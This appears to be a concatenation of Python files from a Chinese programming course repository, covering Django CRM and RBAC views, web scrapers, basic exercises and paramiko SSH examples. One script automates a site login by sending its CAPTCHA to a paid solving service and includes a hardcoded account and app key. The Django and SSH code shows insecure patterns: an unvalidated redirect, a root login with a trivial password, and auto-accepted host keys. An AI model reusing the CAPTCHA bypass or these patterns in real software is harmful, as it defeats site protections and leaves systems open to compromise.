models.ForeignKey(verbose_name='父菜单', to='Permission', null=True, blank=True) <file_sep>/day25/homework/糗事作业/糗事百科作业.py # 作业要求2.实现糗事百科中文字板块中的所有页面的指定数据(段子内容和作者名称也头像url)爬取 import requests from lxml import etree import os # 获取url url = 'https://www.qiushibaike.com/text/page/%s/' headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36', } # 指定起始也结束页码 page_start = int(input('enter start page:')) page_end = int(input('enter end page:')) # 创建文件夹 if not os.path.exists('qiutu'): os.mkdir('qiutu') # 循环解析且下载指定页码中的图片数据 for page in range(page_start, page_end + 1): print('正在下载第%d页图片' % page) new_url = format(url % page) # print(new_url) # response = requests.get(url=new_url, headers=headers,proxies={"https": '192.168.127.12:51505'}) response = requests.get(url=new_url, headers=headers) page_text = response.text # 实例化一个etree对象,并且将页面数据放到etree tree = etree.HTML(page_text) div_list = tree.xpath('//div[@id="content-left"]/div') # print(div_list) # 写入到文件 for div in div_list: # 头像 avatars_url = div.xpath('//div[@class="author clearfix"]/a/img/@src') for avatars in avatars_url: avatars_full_url = 'https:' + avatars # 内容 content = div.xpath('.//div[@class="content"]/span//text()')# 获取到多个 content="".join(content) # 转换成字符串 # print(content+'\n') # 作者 author = div.xpath('.//div[@class="author clearfix"]//h2//text()')[0] # print(author) with open('xiaohua.txt', 'a', encoding='utf-8') as f: f.write(avatars_full_url + "\n" + author + ':' + content + "\n\n") <file_sep>/day2/04_dic.py dic = {'name': 'taibai', 'age': 21, 'hobby': 'girl', } # # #增加 # # dic ['high'] = 180 ##有则覆盖,无则添加 # print (dic) # dic ['name'] = 'ritian' # print (dic) # # dic.setdefault('high',170) ##有则不变,无责添加 # print (dic) # dic.setdefault('sex','nan') # print (dic) # # #删除 # print (dic.pop('name')) # print (dic.pop('name1','没有辞职,sb')) # # # dic.clear() #清空 # # print (dic) # # print (dic.popitem()) #随机删除,返回值 # #改 # dic['name'] = 'laonanhai' # print (dic) # # dic2 = {'name':'alex','weight':75} # dic2.update(dic) # print (dic) # print (dic2) #查 # print (dic['name']) # print (dic.get('name')) # print (dic.get('name1','没有此键值')) # #keys() values() items() # print (list(dic.keys())) ##可以取出键值,变成列表 # for i in dic.keys(): ##可以循环打印键值 # print (i) # # # print (list(dic.values())) ##只能取出values # for i in dic.values(): # print (i) # # print (list(dic.items())) ##可以同时取出键值和values # for i in dic.items(): # print (i) ##其他类型 #分别赋值 a,b = 1,2 print (a,b) a = 1 b = 5 print (a,b) for k,v in dic.items(): print (k,v) #len 长度 print (len(dic)) ##fromkeys 创建一个新字典 dic1 = dict.fromkeys('abc', '张三') print (dic1) #打印结果 {'a': '张三', 'b': '张三', 'c': '张三'} dic3 = dict.fromkeys('abc',[10]) print (dic3) dic3['a'].append('oldboy') print (dic3) #打印结果 {'a': ['oldboy'], 'b': ['oldboy'], 'c': ['oldboy']} # dic = { # 'name_list':['b哥', '张帝', '人帅', 'kitty'], # '老男孩':{ # 'name':'老男孩', # 'age': 46, # 'sex': 'ladyboy', # }, # } # # a = (dic['name_list']) # b=(dic['name_list']).append('骑兵') <file_sep>/day4/优秀的作业/优秀的作业/常莉莉/homework/readme.txt 博客地址:http://www.cnblogs.com/yimiaoyikan/ 作业整体思路: 1)用正则表达式,实现对select 的拆分,拆分出表名字\查询的列\查询条件 2)先读取文件内容,返回一个列表,元素为字典 3)对where条件中的逻辑进行判断,符合条件的返回true,不符合条件返回false 4)对查询的列进行判断,如果查询的列在字典的键中,则打印对应的键值;如果是*,则打印所有的列 作业运行方式: 右键,run.输入select 语句 实现的功能:支持一下几种语法: 1)select * from staff 2)select id,name from staff where id=3 3)select id,name from staff where id>1 4)select id,name from staff where name like lex 5)select * from staff where 1=1 <file_sep>/day6/作业/教研系统作业实例代码.py import sys import json import time # 学校 class School(): def __init__(self, school_name): self.name = school_name def creat_class(self): # 创建班级 print("欢迎创建班级".center(50, '-'), '\n') classroom_name = input("请输入班级名称: ") classroom_period = input("请输入班级周期: ") classroom_obj = Clsaaroom(classroom_name, classroom_period) # 班级类实例 print("创建班级成功".center(50, '-'), '\n') print("班级信息如下:".rjust(10)) classrooms[classroom_name] = classroom_obj # 将班级名和班级实例关联起来 classrooms_dict = { "班级名称":classroom_name, "班级周期":classroom_period } classroom_obj.show_classroom_info() f = open("班级信息.text",'w') f.write(json.dumps(classrooms_dict,ensure_ascii=False, indent=2))#dunps 参数必须要dict类型的 # dunps输出是二进制格式的 ensure_ascii = False 将输出转换成字符串格式 #json.dump(classrooms_obj, open("班级信息.text", "w", encoding='utf-8'), ensure_ascii=False, indent=2) control_view() # 从新调用选择功能函数 def creat_course(self): # 创建课程 print("欢迎创建课程: ".center(50, '-'), '\n') course_name = input("请输入课程名称: ") course_period = input("请输入课程周期: ") course_pay = input("请输入课程价格: ") course_obj = Course(course_name, course_period, course_pay) # 将课程类实例化 print("创建课程成功: ".center(50, '-'), '\n') courses[course_name] = course_obj # 将课程名和课程实例关联起来 course_dic ={"课程名称":course_name, "课程周期":course_period, "课程价格":course_pay} f = open("课程信息",'w') f.write(json.dumps(course_dic,ensure_ascii=False,indent=2)) course_obj.show_course_info() control_view() # 从新调用选择功能函数 def create_teacher(self):#创建讲师 print("创建讲师".center(50, '-')) teacher_name = input("请输入讲师姓名: ") teacher_sex = input("请输入讲师性别: ") teacher_age = input("请输入讲师年龄: ") teacher_school = input("请输入讲师所在学校: ") teacher_course = input("请输入讲师教授课程: ") teacher_classroom = input("请输入讲师所在班级: ") teacher_obj = Teacher(teacher_name, teacher_age, teacher_sex, teacher_course, teacher_school, teacher_classroom) # 实例化讲师 print("创建讲师成功".center(50, '-')) teachers[teacher_name] = teacher_obj # 关联讲师与讲师信息 teachers_dic= {"讲师姓名":teacher_name, "讲师性别":teacher_sex, "讲师年龄":teacher_age, "讲师所在学校":teacher_school, "讲师教授课程":teacher_course, "讲师所在班级":teacher_classroom} teacher_obj.show_teacher_info() control_view()#从新调用选择功能函数 # 班级类 class Clsaaroom(object): def __init__(self, classroom_name, classroom_period): self.classroom_name = classroom_name self.classroom_period = classroom_period def show_classroom_info(self): print("班级名称: %s\n班级周期: %s" % (self.classroom_name, self.classroom_period)) # 课程类 course class Course(object): def __init__(self, course_name, course_period, course_pay): # period 周期 price 价格 self.course_name = course_name self.course_period = course_period self.coyres_pay = course_pay def show_course_info(self): print("课程名称: %s\n课程周期: %s\n课程价格: %s" % (self.course_name, self.course_period, self.coyres_pay)) # 人员类 class Person(object): def __init__(self, name, age, sex): self.name = name self.age = age self.sex = sex # 讲师类 class Teacher(Person): def __init__(self, teacher_name, teacher_age, teacher_sex, teacher_course, teacher_school, teacher_classroom): super(Teacher, self).__init__(teacher_name, teacher_age, teacher_sex) self.teacher_course = teacher_course self.teacher_school = teacher_school self.teacher_classroom = teacher_classroom def show_teacher_info(self): print(""" ——————讲师信息—————— 讲师: %s 性别: %s 年龄: %s 讲师所在学校: %s 讲师所在班级: %s 讲师教授课程: %s """ % (self.name, self.sex, self.age, self.teacher_course, self.teacher_classroom, self.teacher_school)) # 学生类 class Student(Person): def __init__(self, student_name, student_age, student_sex, student_course, student_id, student_period): super(Student, self).__init__(student_name, student_age, student_sex) self.student_course = student_course self.student_id = student_id self.student_period = student_period def show_student_info(self): print(""" ——————学员信息—————— 讲师: %s 性别: %s 年龄: %s 学生学号: %s 学生报名课程: %s 课程周期: %s """% (self.name, self.sex, self.age, self.student_id, self.student_course, self.student_period)) # course 课程 period 周期 def Create_stdent():#创建学员 student_name = input("请输入学生姓名; ") student_age = input("请输入学生年龄: ") student_sex = input("请输入学生性别: ") student_id = input("请输入学生学号: ") student_course = input("请输入学生所选课程: ") student_period = input("请输入课程周期: ") student_obj = Student(student_name, student_age, student_sex, student_id,student_course,student_period)#实例化学生类 students[student_name] = student_obj students_dict = {"学生姓名":student_name, "学生年龄":student_age, "学生性别":student_sex, "学生学号":student_id, "学生所选课程":student_course, "课程周期":student_period } student_obj.show_student_info() f = open("学生信息",'a') f.write(json.dumps(students_dict,ensure_ascii= False,indent = 2)) def Student_view(): print("欢迎进入学生视图".center(50,'-')) student_choice_id = input("请选择功能: " "1.注册" "2.缴费" "3.选择班级" "4.返回" "5.退出" ) if student_choice_id == 1: Create_stdent() elif student_choice_id == 2: pass elif student_choice_id == 3: pass def Teacher_view(): pass def control_view():#管理视图 choice_id = input("\n*************************请选择功能********************\n" "1.创建班级" "2.创建课程" "3.创建讲师" "4.返回" "5.退出\n: ") #choice_id = int(choice_id) # input 输入时字符串格式下面的 choice 是int 类型 需要进行类型转换 if choice_id == '1': schoolid.creat_class() elif choice_id == '2': schoolid.creat_course() elif choice_id == '3': #print("你好") schoolid.create_teacher() #print("你好") elif choice_id == '4': select_fun() elif choice_id == '5': sys.exit() def select_school(): # 选择学校 global schoolid choice_school_id = input("\n*************************请选择学校********************\n" "a.北京大学" "b.清华大学" "q.退出\n: ") if choice_school_id == 'a': schoolid = school1 elif choice_school_id == 'b': schoolid = school2 elif choice_school_id == 'q': sys.exit() else: print("\033[4;35m请输入真确的选项:\033[0m") def select_fun(): # 选择功能 choice_id = input("\n*************************请选择功能********************\n" "1.学院视图" "2.讲师视图" "3.管理视图" "4.返回\n: ") # choice_id = int(choice_id) #input 输入时字符串格式下面的 choice 是int 类型 需要进行类型转换 if choice_id == '1': print("待完善") elif choice_id == '2': print("待完善") elif choice_id == '3': control_view() # print("你好11111") elif choice_id == '4': select_school() else: return time.sleep(2) # schoolid.creat_class() def main(): #Create_stdent() # print("aaa") while True: select_school() while True: select_fun() if __name__ == '__main__': classrooms = {} courses = {} teachers = {} students = {} school1 = School("北大") school2 = School("清华") main()<file_sep>/day7/student_guanlisystem/conf/settings.py userinfo = '../db/userinfo' school_info = '../db/school_info' course_info = '../db/course_info' class_info = '../db/class_info' teacher_info = '../db/teacher_info' student_info = '../db/student_info' classes_dir = '../db/classes'<file_sep>/day24/auto - 12 - 权限粒度控制到按钮/app01/views.py from django.shortcuts import render, HttpResponse, redirect from rbac.service.permission import init_permission from rbac import models def login(request): """ 用户登录 :param request: :return: """ if request.method == "GET": return render(request, 'app01/login.html') user = request.POST.get('user') pwd = request.POST.get('pwd') user = models.UserInfo.objects.filter(username=user, password=pwd).first() if not user: return render(request, 'app01/login.html', {'msg': '用户名或密码错误'}) init_permission(user, request) return redirect('/app01/user/') def user_list(request): """ 用户列表 :param request: :return: """ user_queryset = [ {'id': '1', 'name': '王振兴'}, {'id': '2', 'name': '高栋'}, {'id': '3', 'name': '乔瑞武'}, ] return render(request, 'app01/user_list.html', {'user_queryset': user_queryset}) def user_add(request): return render(request, 'app01/user_add.html') def user_edit(request, nid): return render(request, 'app01/user_edit.html') def user_del(request, nid): return HttpResponse('删除成功') def center(request): return render(request, 'app01/center.html') <file_sep>/day17/s21/app01/views.py from django.shortcuts import render, HttpResponse, redirect from app01 import models from app01 import my_md5 from functools import wraps # session 登录装饰器 def login_check(func): @wraps(func) def inner(request, *args, **kwargs): next_url = request.path_info # print(path) # next_url=request.get_full_path() # print("next_url第一个", next_url) if request.session.get('user'): # session里面获取url return func(request, *args, **kwargs) else: return redirect("/login/?next_url={}".format(next_url)) return inner # 注销页面 @login_check def logout(request): # 删除所有当前请求相关的session request.session.delete() return redirect("/login/") # 登录页面 def login(request): if request.method == "POST": user = request.POST.get("username") # 这里的username必须和html里面的name的值一致 pwd = request.POST.get("password") if user == "" or pwd == "": data = '用户名或密码不能为空' return render(request, "login.html", {"data": data}) else: try: obj = models.User.objects.get(username=user) except Exception: data = "此用户不存在" return render(request, "login.html", {"data": data}) if obj.username == user and obj.password == <PASSWORD>(user, pwd): request.session.set_expiry(0) # 设置过期时间,浏览器关闭就失效 request.session['user'] = obj.username # 获取的登录的用户名 next_url=request.GET.get("next_url") # 获取url后面拼接的路径 # print(next_url) #结果为空 if next_url: return redirect(next_url) else: return redirect("/show_user/") else: data = '用户名和密码错误' return render(request, "login.html", {"data": data}) else: return render(request, 'login.html') # 展示页面 @login_check def show_user(request): current_user = request.session.get("user", None) # 获取用户名 data = models.User.objects.all() return render(request, "user/show_user.html", {"v": current_user, "data": data}) # 注册页面 def register_user(request): if request.method == "POST": # 获取用户添加的用户名和密码 user = request.POST.get("username") pwd = request.POST.get("password") if user == "" or pwd == "": # return HttpResponse("用户名和密码不能为空") data = '用户名和密码不能为空' return render(request, "user/register_user.html", {"data": data}) else: # 写入到数据库 try: models.User.objects.create(username=user, password=<PASSWORD>(user, pwd)) except Exception: data = '用户名已经存在' return render(request, "user/register_user.html", {"data": data}) data = '注册成功,请登录' return render(request, "user/register_user.html", {"data": data}) else: return render(request, "user/register_user.html") # 删除用户 def del_user(request): # 获取用户要删除的id del_id = request.GET.get("id") # 去数据库里面删除 models.User.objects.get(id=del_id).delete() # 返回展示页面 return redirect("/show_user/") # 编辑用户 def edit_user(request): if request.method == "POST": edit_id = request.POST.get("id") new_user = request.POST.get("username") new_pwd = request.POST.get("password") obj = models.User.objects.get(id=edit_id) obj.username = new_user obj.password = <PASSWORD>(<PASSWORD>) try: obj.save() except Exception: data = '用户名已经存在' return render(request, "user/edit_user.html", {"data": data}) return redirect("/show_user/") else: edit_id = request.GET.get("id") obj = models.User.objects.get(id=edit_id) v = request.session.get('user') if v: # 把要编辑的用户展示在这个页面上面 return render(request, "user/edit_user.html", {"user": obj, "v": v}) else: return redirect("/login/") # 增加用户 @login_check def add_user(request): if request.method == "POST": # 获取用户添加的用户名和密码 user = request.POST.get("username") pwd = request.POST.get("password") if user == "" or pwd == "": data = '用户名和密码不能为空' return render(request, "user/add_user.html", {"data": data}) else: # 写入到数据库 try: models.User.objects.create(username=user, password=<PASSWORD>(user, pwd)) except Exception: data = '用户名已经存在' return render(request, "user/add_user.html", {"data": data}) return redirect("/show_user/") else: v = request.session.get('user') if v: return render(request, "user/add_user.html", {"v": v}) else: return redirect("/login/") # 主机管理 # 查看 @login_check def show_host(request): current_user = request.session.get("user", None) # 获取用户名 data = models.Host.objects.all() return render(request, "host/show_host.html", {"v": current_user, "host_list": data}) # # 增加 @login_check def add_host(request): if request.method == "POST": name = request.POST.get("hostname") password = request.POST.get("password") id = request.POST.get("service") if name == "" or password == "": data = "主机名或密码不能为空" return render(request, "host/add_host.html", {"data": data}) else: old_name = models.Host.objects.filter(hostname=name) if old_name: data = "主机名已存在" return render(request, "host/edit_host.html", {"data": data}) else: models.Host.objects.create(hostname=name, service_id=id, pwd=password) return redirect("/show_host/") else: v = request.session.get('user') if v: host = models.Service.objects.all() return render(request, "host/add_host.html", {"host_list": host, "v": v}) else: return redirect("/login/") # 编辑 def edit_host(request, pk): if request.method == "GET": v = request.session.get('user') if v: # 获取机器id host_id = models.Host.objects.get(id=pk) service_obj = models.Service.objects.all() return render(request, "host/edit_host.html", {"host": host_id, "service_list": service_obj, "v": v}) else: return redirect("/login/") else: # 获取机器对象 host_obj = models.Host.objects.get(id=pk) # 获取主机名 new_hostname = request.POST.get("hostname") # print(new_hostname) # 获取密码 new_pwd = request.POST.get("password") # 获取所在业务名称 new_service_id = request.POST.get("service") # 更改 host_obj.hostname = new_hostname host_obj.pwd = <PASSWORD> host_obj.service_id = new_service_id old_name = models.Host.objects.filter(hostname=new_hostname) if old_name: data = "主机名已存在" return render(request, "host/edit_host.html", {"data": data}) else: host_obj.save() return redirect("/show_host/") # 删除主机 def del_host(request, pk): if request.method == "GET": models.Host.objects.get(id=pk).delete() return redirect("/show_host/") <file_sep>/cmdb/auto_client - 7 - 资产信息入库/src/engine/agent.py #!/usr/bin/python # -*- coding:utf-8 -*- import os import json import requests from .base import BaseHandler from ..plugins import get_server_info from config import settings class AgentHandler(BaseHandler): def cmd(self,command,hostname=None): import subprocess return subprocess.getoutput(command) def handler(self): """ 处理Agent模式下的资产采集:网卡、内存、硬盘 :return: """ # 1. 通过调用get_server_info获取所有的资产信息:网卡、内存、硬盘 info = get_server_info(self) # 2. 获取本地文件中的唯一标识 if not os.path.exists(settings.CERT_FILE_PATH): # 新服务器,给API之后,应该在数据库中增加数据 info['type'] = 'create' else: with open(settings.CERT_FILE_PATH,'r',encoding='utf-8') as f: cert = f.read() if cert == info['basic']['data']['hostname']: # 主机名未变更,汇报给API,API做更新 info['type'] = 'update' else: info['cert'] = cert info['type'] = 'host_update' # 3. 发送到api r1 = requests.post( url=self.asset_api, data=json.dumps(info).encode('utf-8'), headers={ 'Content-Type':'application/json' } ) response = r1.json() # 4. 唯一标识更新 if response['status']: with open(settings.CERT_FILE_PATH, 'w', encoding='utf-8') as f: f.write(response['data']) <file_sep>/deploy/script/5.paramiko.py """ pip3 install paramiko 管理工具: - saltstack - salt-ssh - agent(RPC) - ansible - ssh - fabric - 给开发提供接口 """ # ################# 基于paramiko远程连接服务器并执行命令【用户名密码】 ################# """ import paramiko # 创建SSH对象 ssh = paramiko.SSHClient() # 允许连接不在know_hosts文件中的主机 ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # 连接服务器 ssh.connect(hostname='192.168.16.175', port=22, username='root', password='123') # 执行命令 stdin, stdout, stderr = ssh.exec_command('df') # 获取命令结果 result = stdout.read() # 关闭连接 ssh.close() print(result) """ # ################# 基于paramiko远程连接服务器并执行命令【秘钥】 ################# """ import paramiko private_key = paramiko.RSAKey.from_private_key_file('本地私钥') # 前提要把公钥推送到服务器 # 创建SSH对象 ssh = paramiko.SSHClient() # 允许连接不在know_hosts文件中的主机 ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # 连接服务器 ssh.connect(hostname='c1.salt.com', port=22, username='用户名', pkey=private_key) # 执行命令 stdin, stdout, stderr = ssh.exec_command('df') # 获取命令结果 result = stdout.read() # 关闭连接 ssh.close() """ # ################# 基于paramiko远程连接服务器并上传下载文件【用户名密码】 ################# # """ # import paramiko # transport = paramiko.Transport(('192.168.16.175', 22,)) # transport.connect(username='root', password='123') # sftp = paramiko.SFTPClient.from_transport(transport) # # 将location.py 上传至服务器 /tmp/test.py # sftp.put(r'D:\s22\s22day25\x1.py', '/data/x1.py') # # 将remove_path 下载到本地 local_path # # sftp.get('/data/x1.py', r'D:\s22\s22day25\x2.py') # transport.close() # """ # ################# 基于paramiko远程连接服务器并上传下载文件【秘钥】 ################# """ import paramiko private_key = paramiko.RSAKey.from_private_key_file('/home/auto/.ssh/id_rsa') transport = paramiko.Transport(('hostname', 22)) transport.connect(username='wupeiqi', pkey=private_key) sftp = paramiko.SFTPClient.from_transport(transport) # 将location.py 上传至服务器 /tmp/test.py sftp.put('/tmp/location.py', '/tmp/test.py') # 将remove_path 下载到本地 local_path sftp.get('remove_path', 'local_path') transport.close() """ # ################################# 基于秘钥字符串 ######################## import paramiko from io import StringIO key_str = """-----BEGIN OPENSSH PRIVATE KEY----- <KEY> -----END OPENSSH PRIVATE KEY----- """ file_obj=StringIO(key_str) private_key = paramiko.RSAKey() transport = paramiko.Transport(('192.168.7.32', 22)) transport.connect(username='root', pkey=private_key) ssh = paramiko.SSHClient() ssh._transport = transport stdin, stdout, stderr = ssh.exec_command('df') result = stdout.read() transport.close() print(result) <file_sep>/day27/s21crm/crm/views/record.py from django.shortcuts import render, redirect, HttpResponse from crm import models from crm.forms.record import RecordModelForm from django.urls import reverse def record_list(request, nid): """ 跟进记录 :param nid: 客户ID :param request: :return: """ current_user_id = request.session['user_info']['id'] # 当前登录用户id # 查看该客户是否属于当前登录用户的私户,如果不是无权查看 exists = models.Customer.objects.filter(id=nid, consultant_id=current_user_id).exists() if not exists: return HttpResponse('只能查看自己客户的跟进记录') queryset = models.ConsultRecord.objects.filter(customer_id=nid) return render(request, 'record_list.html', {'queryset': queryset, 'cid': nid}) def record_add(request, cid): """ :param request: :param cid: :return: """ if request.method == 'GET': form = RecordModelForm() return render(request, 'record_add.html', {'form': form}) form = RecordModelForm(data=request.POST) if form.is_valid(): # 添加的时候需要把客户id和当前登录用户的id都同时提交 form.instance.customer_id = cid # 客户id form.instance.consultant_id = request.session['user_info']['id'] # 当前登录id form.save() return redirect(reverse('record_list', args=(cid,))) return render(request, 'record_list.html', {'form': form}) <file_sep>/day27/s21crm/crm/views/private.py from django.shortcuts import render, redirect from crm import models from crm.forms.private import ParivateCustomModelForm from django.urls import reverse def private_customer_list(request): """ 私户列表 :param request: :return: """ if request.method == "POST": # 当用户点击申请到私户的时候执行下面代码 id_list = request.POST.getlist('pk') # 获取客户id # 找到私户,并且把当前的私户剔除到公户 models.Customer.objects.filter(id__in=id_list).update(consultant_id=None) current_user_id = request.session['user_info']['id'] # 获取当前登录用户id queryset = models.Customer.objects.filter(consultant=current_user_id).order_by('-status') # 查询当前用户的客户,并且按照报名状态倒叙 return render(request, 'private_custom_list.html', {'queryset': queryset}) def private_customer_add(request): """ 私户添加 :param request: :return: """ if request.method == "GET": form = ParivateCustomModelForm() return render(request, 'private_custom_add.html', {'form': form}) form = ParivateCustomModelForm(data=request.POST) if form.is_valid(): # 课程顾问自己添加客户的时候,默认就是私户 form.instance.consultant_id = request.session['user_info']['id'] # 把课程顾问id设置成当前登录用户的id form.save() return redirect('private_customer_list') else: return render(request, 'private_custom_add.html', {'form': form}) def private_customer_edit(request, nid): """ 编辑私户 :param request: :param nid: :return: """ obj = models.Customer.objects.filter(id=nid).first() if request.method == "GET": form = ParivateCustomModelForm(instance=obj) # 加上instance才能在编辑页面显示原来的数据 return render(request, 'private_custom_edit.html', {"form": form}) form = ParivateCustomModelForm(data=request.POST, instance=obj) # data是把编辑好的数据提交过去 if form.is_valid(): form.save() return redirect('private_customer_list') else: return render(request, 'private_custom_edit.html', {"form": form}) <file_sep>/day25/ower/玩.py import requests from lxml import etree import os url = 'http://www.umei.cc/p/gaoqing/rihan/%s.htm' headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36', } # 创建文件夹 if not os.path.exists('img'): os.mkdir('img') page_start = int(input('enter start page:')) page_end = int(input('enter end page:')) for page in range(page_start, page_end + 1): print('正在下载第%d页图片' % page) new_url = format(url % page) # print(new_url) response = requests.get(url=new_url, headers=headers) page_text = response.text # 实例化一个etree对象,并且将页面数据放到etree tree = etree.HTML(page_text) div_list = tree.xpath('//div[@class="TypeList"]') # 写入到文件 for div in div_list: img_url = div.xpath('//div[@class="TypeList"]//ul/li/a/img//@src') for eva_url in img_url: # print(eva_url) img_full_url=eva_url img_name=eva_url.split('/')[-1] img_data = requests.get(url=img_full_url, headers=headers).content img_path = 'img/' + img_name with open(img_path, 'ab')as f: f.write(img_data) <file_sep>/day25/homework/云打码平台使用流程/cookie带验证码.py import requests from lxml import etree import YunDaMa # 该函数是用来使用云大码平台接口进行验证码识别,返回验证码对应的数据值 def getCode(): # 普通用户用户名 username = 'bobo328410948' # 密码 password = '<PASSWORD>' # 软件ID,开发者分成必要参数。登录开发者后台【我的软件】获得! appid = 6003 # 软件密钥,开发者分成必要参数。登录开发者后台【我的软件】获得! appkey = '1f4b564483ae5c907a1d34f8e2f2776c' # 图片文件 filename = './code.png' # 验证码类型,# 例:1004表示4位字母数字,不同类型收费不同。请准确填写,否则影响识别率。在此查询所有类型 http://www.yundama.com/price.html codetype = 2004 # 超时时间,秒 timeout = 5 # 检查 if (username == 'username'): print('请设置好相关参数再测试') else: # 初始化 yundama = YunDaMa.YDMHttp(username, password, appid, appkey) # 登陆云打码 uid = yundama.login(); print('uid: %s' % uid) # 查询余额 balance = yundama.balance(); print('balance: %s' % balance) # 开始识别,图片路径,验证码类型ID,超时时间(秒),识别结果 cid, result = yundama.decode(filename, codetype, timeout); print('cid: %s, result: %s' % (cid, result)) return result # 对带验证码的人人网登录页面进行请求发送,目的获取验证码图片 url = 'http://www.renren.com/SysHome.do' headers = { # 对UA进行重写操作(伪装) 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64)AppleWebKit/537.36(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' } page_textBymainPage = requests.get(url=url, headers=headers).text # 解析出验证码图片,下载到本地 tree = etree.HTML(page_textBymainPage) codeImg_url = tree.xpath('//*[@id="verifyPic_login"]/@src')[0] codeImg_data = requests.get(url=codeImg_url, headers=headers).content with open('./code.png', 'wb') as fp: fp.write(codeImg_data) print('验证码下载成功') # 进行登录操作,为了获取cookie # 云打码流程: # 注册普通和开发者用户 # 在开发者用户中下载示例代码 HTTPPython # 在开发者用户中创建一个软件 # code = input('enter a code:') code = getCode() session = requests.session() url = 'http://www.renren.com/ajaxLogin/login?1=1&uniqueTimestamp=2018901710806' data = { 'rkey': '<KEY>', 'password': '<PASSWORD>', 'origURL': 'http://www.renren.com/home', 'key_id': '1', 'icode': code, 'f': '', 'email': '<EMAIL>', 'domain': 'renren.com', 'captcha_type': 'web_login', } # 获取请求成功后的cookie数据(session) session.post(url=url, data=data) # 使用携带了cookie的session进行二级子页面的请求发送 url = 'http://www.renren.com/289676607/profile' page_text = session.get(url=url, headers=headers).text with open('./renren.html', 'w', encoding='utf-8') as fp: fp.write(page_text)<file_sep>/day9/进程/锁.py # import os # import time # import random # from multiprocessing import Process,Lock # # def work(n,lock): # lock.acquire()#取的钥匙 # print('%s:%s is running'%(n,os.getpid())) # time.sleep(random.random()) # print('%s:%s is done' %(n,os.getpid())) # lock.release()#释放 # if __name__ == '__main__': # lock=Lock() # for i in range(3): # p=Process(target=work,args=(i,lock)) # p.start() # 牺牲效率但是保证了数据的安全 from multiprocessing import Process,Lock import time,json,random def search():#查票 dic=json.load(open('db')) print('\033[31m剩余票数%s\033[0m' %dic['count']) def get(num):#买票 dic=json.load(open('db')) time.sleep(random.random()) #模拟读数据的网络延迟 if dic['count'] >0: dic['count']-=1 time.sleep(random.random()) #模拟写数据的网络延迟 json.dump(dic,open('db','w')) print('\033[31m用户%s购票成功\033[0m'%num) def task(num,lock): search() lock.acquire() get(num) lock.release() if __name__ == '__main__': lock = Lock() for i in range(10): #模拟并发10个客户端抢票 p=Process(target=task,args = (i,lock)) p.start() <file_sep>/day2/02 list.py #增 #insert 插入 # append 追加 #删除 #pop 有返回值 按照索引删除 #remove #clear #del #改 #按照索引改 #按照切片去改 #查 #按照索引去查询,按照切片去查询 # 其他方法: #count 计数 #len #sort 从小到大 #sort(reverse=True) #从大到小排序 #reverse 反向输出 <file_sep>/day25/ajax_post请求.py # # 需求:爬取肯德基餐厅查询http://www.kfc.com.cn/kfccda/index.aspx中指定地点的餐厅数据 # import requests # # # 请求的url(抓包工具里面的raw里面获取的) # url = 'http://www.kfc.com.cn/kfccda/ashx/GetStoreList.ashx?op=keyword' # # 定制请求头信息,相关的头信息必须封装在字典结构中 # headers = { # # 定制请求头中的User-Agent参数,当然也可以定制请求头中其他的参数 # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36', # } # # 定制post请求携带的参数(抓包工具里面的webforms里面获取的) # data = { # 'cname': '', # 'pid': '', # 'keyword': '邯郸', # 'pageIndex': '1', # 'pageSize': '10' # } # # # 发起post请求,获取响应对象 # response = requests.get(url=url, headers=headers, data=data) # # # 获取响应内容:响应内容为json串 # print(response.text) import requests import urllib.request if __name__ == "__main__": # 指定ajax-post请求的url(通过抓包进行获取) url = 'http://www.kfc.com.cn/kfccda/ashx/GetStoreList.ashx?op=keyword' # 定制请求头信息,相关的头信息必须封装在字典结构中 headers = { # 定制请求头中的User-Agent参数,当然也可以定制请求头中其他的参数 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36', } # 定制post请求携带的参数(从抓包工具中获取) data = { 'cname': '', 'pid': '', 'keyword': '北京', 'pageIndex': '1', 'pageSize': '10' } # 发起post请求,获取响应对象 response = requests.get(url=url, headers=headers, data=data) # 获取响应内容:响应内容为json串 print(response.text) <file_sep>/auto_server/repository/admin.py from django.contrib import admin from . import models admin.site.register(models.Server) admin.site.register(models.Memory) admin.site.register(models.NIC) admin.site.register(models.Disk) admin.site.register(models.ServerRecord) # Register your models here. <file_sep>/day19/homework/s21/app01/migrations/0008_user_services.py # -*- coding: utf-8 -*- # Generated by Django 1.11.11 on 2018-08-22 07:16 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('app01', '0007_auto_20180815_1446'), ] operations = [ migrations.AddField( model_name='user', name='services', field=models.ManyToManyField(related_name='user', to='app01.Service'), ), ] <file_sep>/day22/luffy_permission/rbac/service/permission.py from django.conf import settings def init_permission(request, user_obj): ''' 在session中初始化权限信息和菜单信息的函数 :param request: 请求对象 :param user_obj:当前登录用户 :return: ''' # user_obj.roles.all()那到当前用户的所有角色 ret = user_obj.roles.all().values("permissions__url", "permissions__icon", "permissions__is_menu", "permissions__title" ).distinct() # 取到去重之后的权限 # 定义一个权限列表 permission_list = [] # 定义一个专门用来存放当前用户菜单的列表 menu_list = [] for item in ret: print(item) # item是个大列表 permission_list.append({"permissions__url": item["permissions__url"]}) # 添加到权限列表 if item["permissions__is_menu"]: # 如果为真 menu_list.append({ "title": item["permissions__title"], "icon": item["permissions__icon"], "url": item["permissions__url"] }) # 将用户权限列表信息,存到session中 request.session[settings.PERMISSION_SESSION_KEY] = permission_list # 把当前用户的所有菜单存放到sessioin request.session[settings.MENU_SESSION_KEY] = menu_list <file_sep>/day9/client.py import socket sk=socket.socket() sk.connect(('127.0.0.1',9000)) print(sk.recv(1024)) print(sk.recv(1024)) sk.close() <file_sep>/deploy/web/views/project.py from django.shortcuts import render,HttpResponse,redirect from 